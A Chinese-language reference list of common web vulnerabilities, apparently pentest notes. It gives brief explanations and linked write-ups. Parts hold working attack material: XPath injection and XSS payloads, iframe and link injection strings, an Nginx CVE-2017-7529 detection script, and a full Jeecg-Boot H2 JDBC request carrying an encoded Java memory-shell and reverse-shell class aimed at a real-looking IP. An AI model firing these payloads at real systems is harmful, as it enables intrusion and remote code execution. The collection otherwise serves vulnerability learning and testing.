常见漏洞汇总

认证页面权限绕过

检测到此页面需授权访问,但通过访问特殊路径或构造特殊请求可以绕过权限认证。

绕过认证的五种方式 - FreeBuf网络安全行业门户

暴力破解HTTP身份验证 - D Blog
        

web页面错误消息 

应用程序错误或告警消息可能会将与应用程序内部工作机制有关的敏感信息暴露给攻击者。

Nginx Web安全漏洞解决:Web服务器HTTP头信息公开以及Web服务器错误页面信息泄露-百度开发者中心

         

用户凭据明文传输

用户凭据通过未加密的通道传输。此信息应始终通过加密通道 (HTTPS) 传输,以避免被恶意用户拦截。

【中危】用户凭据明文传输-CSDN博客
                

TLS/SSL 证书过期

您的服务器发送的其中一个 TLS/SSL 证书已过期或尚未生效。 大多数 Web 浏览器都会向最终用户显示安全警告,要求他们手动确认您的证书链的真实性。 软件或自动化系统可能会默认拒绝连接到服务器。 此告警不一定由服务器(叶)证书引起,可能已由中间证书触发。 请参阅告警详细信息中的证书序列号以识别受影响的证书。

SSL/TLS类漏洞验证与修复 - 香农Shannon - 博客园

        

Laravel调试模式已启用

Web应用程序使用Laravel框架。Laravel调试模式已启用,在生产环境中应该关闭调试模式,因为它会导致有关Web应用程序的敏感信息的泄露。

漏洞复现| Laravel Debug mode RCE(CVE-2021-3129)_laravel debug页面rce(cve-2021-3129)-CSDN博客

        

WordPress插件Elementor Website跨站脚本漏洞 (CVE-2022-29455)

WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。攻击者可利用该漏洞在客户端执行JavaScript代码。

WordPress Elementor plugin <= 3.5.5 - Unauthenticated DOM-based Reflected Cross-Site Scripting (XSS) vulnerability 漏洞信息(CVE-2022-29455) - by 漏洞平台

        

跨域资源共享

跨域资源共享(CORS) 是一种机制,它使用额外的 HTTP 头来告诉浏览器  让运行在一个 origin (domain) 上的Web应用被准许访问来自不同源服务器上的指定的资源。当一个资源从与该资源本身所在的服务器不同的域、协议或端口请求一个资源时,资源会发起一个跨域 HTTP 请求。

跨域资源共享 CORS 详解 - 阮一峰的网络日志

        

压缩文件

一些网站维护人员需要定期对网站目录进行备份,习惯直接将网站内容打包后就放在网站目录下。当攻击者通过Web访问方式尝试请求该压缩包即可下载源码包,此信息可以帮助攻击者对站点进一步的攻击。

.../backup/bin.rar
.../desktop/app-desktop/dist.zip
.../common-static/common-static.zip

        

IIS短文件名泄露

    windows下通过~表示短文件名,如:test~1, 在IIs中可通过短文件名的方式判断目标文件是否存在,从而降低文件名暴力猜解的难度。

    可使用http://test/%2Fconnec~1.as*%2Fx.aspx 如果存在connec开头的asp,aspx等类似文件,将返回文件不存在的错误,否则将返回非法请求。

IIS短文件名漏洞复现 - 雨中落叶 - 博客园

        

SSL 3.0协议

远程服务使用SSL 3.0加密流量,这是不安全且已弃用的协议,具有众所周知的漏洞。

SSLv3 存在严重设计缺陷漏洞 (CVE-2014-3566)-CSDN博客

SSL 3.0 POODLE攻击信息泄露漏洞_CVE-2014-3566 - Voyager0 - 博客园
        

XPath注入

XPath注入攻击是针对Web服务应用新的攻击方法,它利用XPath解析器的松散输入和容错特性,在URL、表单或其它信息上附带恶意的XPath查询代码,来获得权限限制信息的访问权并更改这些信息,同时它还允许攻击者在事先不知道XPath查询相关信息的情况下,通过XPath查询得到一个完整的XML文档内容。

万能密码登录Payload:
//users/user[LoginID/text()='' or 1=1 and password/text()='' or 1=1]
//users/user[LoginID/text()='' or 1=1 and password/text()='111111111111']
这些payload试图通过绕过登录验证来获取所有用户数据。

基于布尔值的Payload:
' or '1'='1
']|//*|//*['
这些payload通常用于测试是否存在XPath注入漏洞,并通过布尔逻辑判断查询结果。

利用字符串操作函数的Payload:
获取字符长度:string-length(name(/*[1]))
截取字符:substring(name(/*[1]), 1, 1)
这些函数可以用于XPath盲注攻击中,通过逐步猜测字符来推断数据内容。

结合逻辑运算符和字符串操作函数的Payload:
' or string-length(name(/*[1]))=8 and ''='
' or substring(name(/*[1]), 1, 1)='a' and ''='
这些payload结合了逻辑运算符和字符串操作函数,用于在XPath盲注攻击中逐步推断出数据内容。

针对特定节点的Payload:
//accounts/user[username='{$username}' and password='{$password}']
这是一个典型的XPath查询语句,用于验证用户名和密码。攻击者可能会尝试注入恶意输入来绕过验证。

xpath注入详解 - 渗透测试中心 - 博客园

         

访问控制文件内容泄露

Web根目录中的特定文件、目录为了做到限制性的访问,可能使用Web服务器访问控制机制,比如:.htaccess、.htpasswd、.htgroup,上述三个文件在使用过程中,可能产生副本文件或者权限设置不合理,攻击者读取上述文件的内容,以便进一步攻击目标站点。

.../upload/.htaccess
.../system/.htaccess

访问控制/越权漏洞 -- 学习笔记_x-original-url-CSDN博客

        

Frontpage Server Extensions 信息泄露 (CVE-2000-0114)

Frontpage Server Extensions存在漏洞。远程攻击者借助/_vti_bin/ 中shtml.dll的RPC POST请求确定匿名账户的名称。

.../_vti_inf.html

漏洞信息(CVE-2000-0114) - by 漏洞平台

        

启用 Asp.Net Core 开发模式

检测到 Web 应用程序以开发模式运行,应避免在生产环境中使用开发模式,因为它会泄露有关 Web 应用程序的敏感信息。

        

开发配置文件

在此目录中找到了一个配置文件(例如Vagrantfile,Gemfile,Rakefile等)。该文件可能会公开敏感信息,并帮助恶意用户进行更高级的攻击。建议从生产系统中删除或限制对此类文件的访问。

.../package.json
.../uppic/.gitignore

配置文件信息泄露_配置文件泄露-CSDN博客

        

跨站脚本

跨站脚本(cross-site scripting,XSS)是一种安全攻击,其中,攻击者在看上去来源可靠的链接中恶意嵌入译码。当有人点击链接,嵌入程序作为客户网络要求的一部分提交并且会在用户电脑上执行,一般来说会被攻击者盗取信息。如果存在xss漏洞,一般也存在着链接注入、框架注入漏洞(见下文)

<script>alert('xss')</script>
"><script>alert('xss')</script>

【XSS】payload 常用构造和变形方法_xss payload-CSDN博客

跨站脚本攻击(XSS)复现与防范、上海交通大学反射型与存储型xss案例-CSDN博客

          

普元Primeton EOS Platform remote反序列化代码执行

普元EOS /default/.remote 接口存在远程代码执行漏洞,攻击者利用该漏洞可以执行恶意代码。

记一次普元Primeton EOS Platform反序列化漏洞的利用链报错问题调整

        

Nginx远程整数溢出

Nginx是由俄罗斯的程序设计师Igor Sysoev所开发的一款轻量级Web服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器。range filter module是其中的一个范围过滤器模块。攻击者可利用该漏洞获取敏感信息。

# 检测POC
import requests
import time
import urllib3
def cve20177529():
    try:

        # 构造请求头

        headers = {
            'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
        }
        url = input('请输入目标URL:')

        # 获取正常响应的返回长度

        #verify=False防止ssl证书校验,allow_redirects=False,防止跳转导致误报的出现
        r1 = requests.get(url,headers=headers,verify=False,allow_redirects=False) 
        url_len = len(r1.content)

        # 将数据长度加长,大于返回的正常长度

        addnum = 200
        final_len = url_len + addnum

        # 构造Range请求头,并加进headers中

        # headers['Range'] = "bytes=-%d,-%d" % (final_len, 0x8000000000000000-final_len)

        headers = {
            'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36",
            'Range':"bytes=-%d,-%d" % (final_len, 0x8000000000000000-final_len)
        }

        # 用构造的新的headers发送请求包,并输出结果

        r2 = requests.get(url, headers=headers,verify=False,allow_redirects=False)
        text = r2.text
        code = r2.status_code
        if ('ETag') in text and code == 206:
            print('存在Nginx整数溢出漏洞(CVE-2017-7529),已输出到cve20177529_log.txt')

            # 将结果输出到文本上

            with open('cve20177529_log.txt','a',encoding="utf-8") as f:
                f.write('存在Nginx整数溢出漏洞(CVE-2017-7529)-------------'+time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))+'-------------\n' + r2.text)
                f.close
        else:
            print('未检测到漏洞')

            # 将结果输出到文本上

            with open('cve20177529_log.txt','a',encoding="utf-8") as f:
                f.write('未检测到漏洞-------------'+time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))+'-------------\n' + r2.text)
                f.close    
        
    except Exception as result:
        print(result)

if __name__ == "__main__":
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    cve20177529()

Nginx整数溢出漏洞(CVE-2017-7529)复现_cve-2017-7529复现-CSDN博客

         

使用Http基础认证

在 HTTP 事务的上下文中,基本访问认证是一个 HTTP 用户代理发出一个请求时,提供一个用户名和密码的方法。基本身份验证的用户凭证将作为明文,因为不使用 HTTPS,它们很容易受到数据包嗅探。

        

表单提交中从HTTP到HTTPS的不安全转换

此表单是通过不安全页面(http)页面提供的。可以使用中间人攻击来劫持此页面,并且攻击者可以替换表单提交目标。

        

使用不安全的UUID/GUID V1版本

UUID(通用唯一标识符)也称为GUID,是用于唯一标识internet上的对象或实体的128位值。此web应用程序正在使用UUID V1版本。UUID V1版本以可预测的方式生成

1.根据当前时间戳随机生成的"时钟序列",在生成系统的正常运行时间内GUID之间保持不变

2.节点ID,根据系统的MAC地址生成(如果可用的话)

永远不要依赖 UUID 进行身份验证:生成漏洞和最佳实践 | HackerNoon

         

HTTP参数污染

HTTP参数污染(HPP)攻击是将编码的查询字符串分隔符注入到其他现有参数中。如果Web应用程序未正确清理用户输入,则恶意用户可能会破坏应用程序的逻辑以执行客户端或服务器端攻击。

Bypass WAF之HTTP参数污染(HPP)漏洞挖掘_hpp参数污染-CSDN博客

         

源代码泄露

如果访问者访问的是含有敏感信息的应用程序、临时代码文件以及未正确配置网站目录,就会直接反馈给访问者Web应用程序的源代码。

        

新思创OA系统upctrl.php任意文件上传

 新思创OA系统upctrl.php存在任意文件上传漏洞,攻击者可利用该漏洞上传任意文件,包括但不限于php文件,从而执行任意代码。

         

跨站请求伪造 (CSRF)

CSRF缩写为CSRF或者XSRF,是一种对网站的恶意利用。XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。

CSRF漏洞原理攻击与防御(非常细)-CSDN博客

4.3检测CSRF漏洞_burpsuit 如何测试csrf-CSDN博客

        

PHPCMS content_input.class.php SQL注入

PHPCMS是一款开源的CMS系统,PHPCMS content_input.class.php文件存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。

        

Pivotal Spring Framework跨域请求漏洞

Pivotal Spring Framework是美国Pivotal Software公司的一套开源的Java、Java EE应用程序框架,该框架可帮助开发人员构建高质量的应用。该漏洞源于程序允许Web应用程序通过JSONP打开跨域的请求。攻击者可利用该漏洞将用户信息泄露到第三方浏览器脚本。

        

PHPCMS V9 flash跨站脚本

 PHPCMS V9 player.swf存在跨站脚本漏洞,远程攻击者可利用该漏洞在用户浏览器中执行恶意的JavaScript代码。

        

Shiro RememberMe 1.2.4 反序列化命令执行

 Apache Shiro是美国阿帕奇(Apache)软件基金会的一套用于执行认证、授权、加密和会话管理的Java安全框架。该漏洞源于程序未能正确配置remember me功能使用的密钥。攻击者可通过发送带有特制参数的请求利用该漏洞执行任意代码或访问受限制内容。

Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437 )-CSDN博客

         

HTML 注入

在 XSS 漏洞中,攻击者可以注入和执行 Javascript 代码,而 HTML 注入攻击只允许注入某些 HTML 标签。当应用程序没有正确处理用户提供的数据时,攻击者可以提供有效的 HTML 代码,通常是通过参数值,并将他们自己的内容注入到页面中。

HTML注入综合指南 - 知乎

         

SQL注入

应用程序对访问者的输入处理未做检查或者检查的不完善,访问者便可以构造恶意的数据,当该数据并入SQL查询中时,就将得到访问者期望的结果。

SQLmap使用教程图文教程(超详细)-CSDN博客

SQL注入语句(详细)-CSDN博客

                

链接注入

链接注入是将某个URL嵌入到被攻击的网站上,进而修改站点页面。被嵌入的URL包含恶意代码,可能窃取正常用户的用户名、密码,也可能窃取或操纵认证会话。

"><a href='1.htm'>Link_Injecting</a>

浅谈“链接或框架注入”_链接注入-CSDN博客

        

框架注入

框架注入是将frame或iframe标签嵌入到被攻击的网站上,进而修改站点页面。被嵌入的页面包含恶意代码,可能诱惑用户登录,获取合法的登录凭证。

"><iframe src=http://www.baidu.com>


        

Swagger UI敏感信息泄露

 Swagger 是一个规范和完整的框架,用于生成、描述、调用和可视化 RESTful 风格的 Web 服务。Swagger UI存在敏感信息泄露漏洞。

.../apiAsset/swagger-resources
.../dfi/swagger-resources/configuration/ui
.../PartyBuilding/swagger-resources/configuration/ui

针对Swagger接口泄露未授权访问的各种姿势_swagger未授权访问-CSDN博客

                 

Jeecg-Boot JimuReport testConnection JDBC 远程代码执行漏洞

JeecgBoot 受影响版本中,由于 jeecg-boot/jmreport/testConnection Api接口未进行身份验证,并且未对 dbUrl 参数进行限制,当应用端存在H2数据库驱动依赖时,攻击者发送包含恶意 dbUrl 参数的http请求远程执行任意代码。

//测试数据包
POST /jmreport/testConnection HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Host: 1.13.178.132:8085
Cmd: whoami
Content-Type: application/json
Content-Length: 8820

{"id": "1", "code": "ABC", "dbType": "MySQL", "dbDriver": "org.h2.Driver", "dbUrl": "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS EXEC AS 'void shellexec(String b) throws Exception {byte[] bytes\\;try{bytes=java.util.Base64.getDecoder().decode(b)\\;}catch (Exception e){e.printStackTrace()\\;bytes=javax.xml.bind.DatatypeConverter.parseBase64Binary(b)\\;}java.lang.reflect.Method defineClassMethod = java.lang.ClassLoader.class.getDeclaredMethod(\\\"defineClass\\\", byte[].class,int.class,int.class)\\;defineClassMethod.setAccessible(true)\\;Class clz=(Class)defineClassMethod.invoke(new javax.management.loading.MLet(new java.net.URL[0],java.lang.Thread.currentThread().getContextClassLoader()), bytes, 0,bytes.length)\\;clz.newInstance()\\;}'\\;CALL EXEC('yv66vgAAADEBawoAHQCSCgBEAJMKAEQAlAoAHQCVCACWCgAbAJcKAJgAmQoAmACaBwCbCgBEAJwIAIwKACAAnQgAnggAnwcAoAgAoQgAogcAowoAGwCkCAClCACmBwCnCwAWAKgLABYAqQgAqggAqwcArAoAGwCtBwCuCgCvALAIALEHALIIALMKAH4AtAoAIAC1CAC2CQAmALcHALgKACYAuQgAugoAfgC7CgAbALwIAL0HAL4KABsAvwgAwAcAwQgAwggAwwoAGwDEBwDFCgBEAMYKAMcAuwgAyAoAIADJCADKCgAgAMsIAMwKACAAzQoAIADOCADPCgAgANAIANEJAH4A0goAJgDTCgAmANQJAH4A1QcA1goARADXCgBEANgIAI0IANkKAH4A2ggA2woA3ADdCgAgAN4IAN8IAOAIAOEHAOIKAFAAkgoAUADjCADkCgBQAOUIAOYIAOcIAOgIAOkKAOoA6woA6gDsBwDtCgDuAO8KAFsA8AgA8QoAWwDyCgBbAPMKAFsA9AoA7gD1CgDuAPYKAC8A5QgA9woAIAD4CAD5CgDqAPoHAPsKACYA/AoAaQD9CgBpAO8KAO4A/goAaQD+CgBpAP8KAQABAQoBAAECCgEDAQQKAQMBBQUAAAAAAAAAMgoARAEGCgDuAQcKAGkBCAgBCQoALwEKCAELCAEMCgB+AQ0HAQ4BAAJpcAEAEkxqYXZhL2xhbmcvU3RyaW5nOwEABHBvcnQBABNMamF2YS9sYW5nL0ludGVnZXI7AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEACkV4Y2VwdGlvbnMBAAlsb2FkQ2xhc3MBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQAHZXhlY3V0ZQEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQAEZXhlYwEAB3JldmVyc2UBADkoTGphdmEvbGFuZy9TdHJpbmc7TGphdmEvbGFuZy9JbnRlZ2VyOylMamF2YS9sYW5nL1N0cmluZzsBAANydW4BAApTb3VyY2VGaWxlAQAHQTQuamF2YQwAgwCEDAEPARAMAREBEgwBEwEUAQAHdGhyZWFkcwwBFQEWBwEXDAEYARkMARoBGwEAE1tMamF2YS9sYW5nL1RocmVhZDsMARwBHQwBHgEfAQAEaHR0cAEABnRhcmdldAEAEmphdmEvbGFuZy9SdW5uYWJsZQEABnRoaXMkMAEAB2hhbmRsZXIBAB5qYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb24MASABFAEABmdsb2JhbAEACnByb2Nlc3NvcnMBAA5qYXZhL3V0aWwvTGlzdAwBIQEiDAEaASMBAANyZXEBAAtnZXRSZXNwb25zZQEAD2phdmEvbGFuZy9DbGFzcwwBJAElAQAQamF2YS9sYW5nL09iamVjdAcBJgwBJwEoAQAJZ2V0SGVhZGVyAQAQamF2YS9sYW5nL1N0cmluZwEAA2NtZAwAigCLDAEpASoBAAlzZXRTdGF0dXMMASsBLAEAEWphdmEvbGFuZy9JbnRlZ2VyDACDAS0BACRvcmcuYXBhY2hlLnRvbWNhdC51dGlsLmJ1Zi5CeXRlQ2h1bmsMAIgAiQwBLgEvAQAIc2V0Qnl0ZXMBAAJbQgwBMAElAQAHZG9Xcml0ZQEAE2phdmEvbGFuZy9FeGNlcHRpb24BABNqYXZhLm5pby5CeXRlQnVmZmVyAQAEd3JhcAwBMQCJAQAgamF2YS9sYW5nL0NsYXNzTm90Rm91bmRFeGNlcHRpb24MATIBMwcBNAEAAAwBNQE2AQAQY29tbWFuZCBub3QgbnVsbAwBNwEdAQAFIyMjIyMMATgBOQwBOgE7AQABOgwBPAE9AQAiY29tbWFuZCByZXZlcnNlIGhvc3QgZm9ybWF0IGVycm9yIQwAfwCADAE+AT8MAUABQQwAgQCCAQAQamF2YS9sYW5nL1RocmVhZAwAgwFCDAFDAIQBAAVAQEBAQAwAjACLAQAHb3MubmFtZQcBRAwBRQCLDAFGAR0BAAN3aW4BAARwaW5nAQACLW4BABdqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcgwBRwFIAQAFIC1uIDQMAUkBHQEAAi9jAQAFIC10IDQBAAJzaAEAAi1jBwFKDAFLAUwMAIwBTQEAEWphdmEvdXRpbC9TY2FubmVyBwFODAFPAVAMAIMBUQEAAlxhDAFSAVMMAVQBVQwBVgEdDAFXAVAMAVgAhAEABy9iaW4vc2gMAIMBWQEAB2NtZC5leGUMAIwBWgEAD2phdmEvbmV0L1NvY2tldAwBWwEiDACDAVwMAV0BXgwBXwFVBwFgDAFhASIMAWIBIgcBYwwBZAEtDAFlAIQMAWYBZwwBaAEiDAFpAIQBAB1yZXZlcnNlIGV4ZWN1dGUgZXJyb3IsIG1zZyAtPgwBagEdAQABIQEAE3JldmVyc2UgZXhlY3V0ZSBvayEMAI0AjgEAAkE0AQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAOZ2V0VGhyZWFkR3JvdXABABkoKUxqYXZhL2xhbmcvVGhyZWFkR3JvdXA7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQANc2V0QWNjZXNzaWJsZQEABChaKVYBAANnZXQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAB2dldE5hbWUBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaAQANZ2V0U3VwZXJjbGFzcwEABHNpemUBAAMoKUkBABUoSSlMamF2YS9sYW5nL09iamVjdDsBAAlnZXRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAIZ2V0Qnl0ZXMBAAQoKVtCAQAEVFlQRQEAEUxqYXZhL2xhbmcvQ2xhc3M7AQAEKEkpVgEAC25ld0luc3RhbmNlAQAUKClMamF2YS9sYW5nL09iamVjdDsBABFnZXREZWNsYXJlZE1ldGhvZAEAB2Zvck5hbWUBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQAGZXF1YWxzAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaAQAEdHJpbQEACnN0YXJ0c1dpdGgBABUoTGphdmEvbGFuZy9TdHJpbmc7KVoBAAdyZXBsYWNlAQBEKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlO0xqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylMamF2YS9sYW5nL1N0cmluZzsBAAVzcGxpdAEAJyhMamF2YS9sYW5nL1N0cmluZzspW0xqYXZhL2xhbmcvU3RyaW5nOwEACHBhcnNlSW50AQAVKExqYXZhL2xhbmcvU3RyaW5nOylJAQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsBABcoTGphdmEvbGFuZy9SdW5uYWJsZTspVgEABXN0YXJ0AQAQamF2YS9sYW5nL1N5c3RlbQEAC2dldFByb3BlcnR5AQALdG9Mb3dlckNhc2UBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEAKChbTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAAdoYXNOZXh0AQADKClaAQAEbmV4dAEADmdldEVycm9yU3RyZWFtAQAHZGVzdHJveQEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEACGludFZhbHVlAQAWKExqYXZhL2xhbmcvU3RyaW5nO0kpVgEAD2dldE91dHB1dFN0cmVhbQEAGCgpTGphdmEvaW8vT3V0cHV0U3RyZWFtOwEACGlzQ2xvc2VkAQATamF2YS9pby9J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')", "dbName": "383BAb7deFC825E6", "dbPassword": "917982", "userName": "917982"}

漏洞复现--JeecgBoot testConnection 远程代码执行_jeecg-boot复现-CSDN博客

                 

Ivanti Connect Secure 服务端请求伪造 (CVE-2024-21893)

Ivanti Connect Secure是美国Ivanti公司的安全远程网络连接工具。该漏洞源于SAML组件中的存在服务器端请求伪造漏洞,允许攻击者无需身份验证访问某些受限资源。

Ivanti Connect Secure SSRF to RCE漏洞复现(CVE-2024-21893)_ivanti policy ssrf远程执行命令漏洞 (cve-2024-21893)-CSDN博客

                 

FREAK 攻击

